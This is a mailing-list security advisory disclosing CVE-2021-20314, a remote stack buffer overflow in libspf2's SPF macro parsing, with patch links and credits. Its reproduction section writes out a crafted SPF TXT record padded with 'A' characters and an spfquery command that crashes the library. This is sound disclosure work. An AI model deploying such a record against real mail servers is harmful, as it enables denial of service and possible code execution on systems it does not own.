oss-sec mailing list archives
CVE-2021-20314: Remote stack buffer overflow in libspf2
From: "Philipp Jeitner (SIT)" <philipp.jeitner () sit fraunhofer de>
Date: Wed, 11 Aug 2021 16:41:16 +0200
#### DescriptionStack buffer overflow in libspf2 versions below 1.2.11 when processing certain SPF macros can lead to Denial of service and potentially code execution via malicious crafted SPF explanation messages. CVE-2021-20314 has been assigned to this issue.
#### Attack type Remote #### Impact (x) Code Execution (x) Denial of Service #### Attack vector(s):Attackers need to cause a mail server to process a malicious SPF record, ie. via sending an email from an attacker-controlled domain. Thus, any mail server accepting mails and processing them via libspf2 is vulnerable.
#### Patch The issue has been fixed in github commit c37b7c1: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552efAn updated version of libspf2 (1.2.11) which also fixes other security related issues is available from github (https://github.com/shevek/libspf2). The libspf2 website (https://www.libspf2.org/download.html) and latest release there is NOT UPDATED YET.
#### Discoverer(s)/Credits Philipp Jeitner and Haya Shulman, Fraunhofer SIT philipp.jeitner () sit fraunhofer de haya.shulman () sit fraunhofer de #### Reference(s) - libspf2: https://www.libspf2.org/, https://github.com/shevek/libspf2- patch: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef - Injection Attacks Reloaded: Tunneling Malicious Payloads over DNS https://www.usenix.org/conference/usenixsecurity21/presentation/jeitner
#### Details and information to reproduce the vulnerability To reproduce, set the SPF record of a domain you control like listed below: example.com. 300 IN TXT "v=spf1 exp=exp.example.com"exp=exp.example.com. 300 IN TXT "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
Then trigger SPF processing in libspf2, ie. via the command line `spfquery` tool.
# spfquery --sender someone () example com -ip 1.2.3.4 *** stack smashing detected ***: terminated Aborted (core dumped)The record causes a 4-byte stack buffer overflow of local variable `buf` in `SPF_record_compile_macro`, which is responsible for parsing the potential macros included in the SPF explanation message. The overflow is caused by an incorrect buffer length adjustment in the `SPF_INIT_STRING_LITERAL` macro which places a 4-byte header of type `SPF_data_str` into the buffer inside `buf` without decreasing the available size `ds_avail` by 4. Exploiting this vulnerability therefore allows the attacker to override up to 4 bytes on the stack of `SPF_record_compile_macro` directly after `buf`.
Current thread:
- CVE-2021-20314: Remote stack buffer overflow in libspf2 Philipp Jeitner (SIT) (Aug 11)
- Re: CVE-2021-20314: Remote stack buffer overflow in libspf2 Sam James (Aug 12)